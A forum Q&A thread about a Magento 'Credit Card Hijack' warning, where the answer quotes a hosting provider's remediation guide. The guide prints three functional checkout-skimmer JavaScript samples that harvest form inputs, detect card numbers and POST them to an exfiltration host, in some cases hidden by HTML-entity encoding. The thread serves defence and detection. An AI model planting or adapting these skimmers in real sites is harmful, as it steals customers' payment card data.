# Magento Credit Card Hijack - how to make sure I'm safe?

Tags: magento-1.9, patches, security, credit-card

Checked my Magento with `Magereport` and checked all the points they suggested but it still showing me a `"red"` `Credit Card Hijack` even if I remove all the scripts from header/footer.

Did anyone solved this problem ?

Answer (score 1):

Removing script from header and footer is not a complete solution. There is already descriptive information from MageReport, I am pasting them here.

**How do I fix it?**

Fixing this breach is not an easy task. If you don’t have a lot of knowledge of Magento’s security, we recommend you hire an Magento developer or specialist experienced in Magento security.

**Apply all available Magento patches**

Scan your shop with Magereport.com to find out what patches have been and have not been installed yet. When a patch isn’t installed, install it with the instructions given or use the article How to apply Magento Patches.

**Review and remove**

Review all admin users in your system via Magento’s backend (navigate to system>Permissions>Roles). Remove any accounts which you are not actively using and set strong passwords for all admin users you do use.

**Remove unknown scripts (PHP & Javascript)**

Search your shop for scripts similar to the ones below and remove them. Searching and removing can be done via Magento’s backend. Once logged in to your backend (screenshots below):

1. Navigate to ‘System’ -> Configuration Go to ‘Design’ under ‘General’
2. Scroll down and open HTML Head to check ‘Miscellaneous Scripts’
3. Scroll down and open Footer to check Miscellaneous HTML

If Miscellaneous scripts and Miscellaneous HTML are empty, you’re most likely safe. If not, check if they contain the scripts below:

The script below is an example of a minified version of the scraper Javascript.

```
<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>
```

The script below is an example of Credit card Hijack’s malicious code. It installs the functions ‘send’ and ‘clk’, which allows hackers to collect the names and content of every common form input element, when your customer clicks a button or submits a form.

```
<script>
var snd =null;
window.onload = function () {
 if((new RegExp('onepage')).test(window.location)) {
 send();

 }
};

function clk() {
 var inp=document.querySelectorAll("input, select, textarea, checkbox");
 for (var i=0;i<inp.length;i++){
 if(inp[i].value.length>0) {
 var nme=inp[i].name;
 if(nme=='') { nme=i; }
 snd+=inp[i].name+'='+inp[i].value+'&';
 }
 }

}

function send() {
var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
 for (var i=0;i<btn.length;i++){
 var b=btn[i];
 if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
 if(b.addEventListener) {
 b.addEventListener("click", clk, false);
 }else {
 b.attachEvent('onclick', clk);
 }
 }
 }

 var frm=document.querySelectorAll("form");
 for (var i=0;i<frm.length;i++){
 if(frm[i].addEventListener) {
 frm[i].addEventListener("submit", clk, false);
 }else {
 frm[i].attachEvent('onsubmit', clk);
 }
 }

 if(snd!=null) {
 console.clear();
 var cc = new RegExp("[0-9]{13,16}");
 var asd="0";
 if(cc.test(snd)){
 asd="1" ;
 }
var http = new XMLHttpRequest();
http.open("POST","https://bad.guy/jquery.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym");
console.clear();
 }
 snd=null;
 setTimeout('send()', 150);
}

</script>
```

The script below was found during the research done by Byte. It covers the same functionality as the script above, but is harder to spot because it’s included in a minimized form. In this script Jquery is used to add unnamed click event-handler to every button on the page. If someone clicks the button, the function is triggered and allowed to collect al input data. It checks for credit card numbers and this information is sent off to their data collection server.

```
<script>
 function jj(e) {
 var t = "; " + document.cookie
 , o = t.split("; " + e + "=");
 return 2 == o.length ? o.pop().split(";").shift() : void 0
 }
 jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime())
 , jQuery(function (e) {
 e("button").on("click", function () {
 var t = ""
 , o = "post"
 , n = window.location;
 if (new RegExp("onepage|checkout").test(n)) {
 for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
 if (c[i].value.length > 0) {
 var a = c[i].name;
 "" == a && (a = i)
 , t += a + "=" + c[i].value + "&"
 }
 if (t) {
 var l = new RegExp("[0-9]{13,16}")
 , u = new XMLHttpRequest;
 u.open(o, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0)
 , u.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 , u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID"))
 , console.clear()
 }
 }
 })
 });
</script>
```

**Recover your shop**

Since Credit card Hijack is an ongoing credit card fraud dating from may this year, it’s difficult to pinpoint how exactly the hackers got in. We assume it’s due to a combination of various know Magento leaks (these past months several Magento patches came out, and with it a high media coverage). It’s likely hackers used these security vulnerablities to set up this credit card fraud.

References:
[How to fix malicious JavaScript Credit card Hijack?](https://support.hypernode.com/knowledgebase/how-to-fix-credit-card-hijack/)

[How to recover a hacked Magento shop](https://support.hypernode.com/knowledgebase/recover-a-hacked-magento-shop/)

Comment: Yes, i already read this article, but thank you .